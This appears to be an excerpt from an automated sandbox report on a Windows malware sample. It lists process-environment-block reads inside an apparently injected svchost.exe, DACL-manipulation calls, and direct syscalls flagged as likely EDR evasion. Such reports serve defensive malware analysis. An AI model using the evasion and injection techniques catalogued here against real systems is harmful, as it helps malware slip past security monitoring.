Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]	2_2_03260854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]	2_2_03230887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]	2_2_032BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_032FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0325E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]	2_2_0325EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]	2_2_032E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]	2_2_03232F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]	2_2_0326CF1F

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C181F7

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00BEA395
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BEA364 SetUnhandledExceptionFilter,		0_2_00BEA364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtTerminateThread: Direct from: 0x77542FCC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
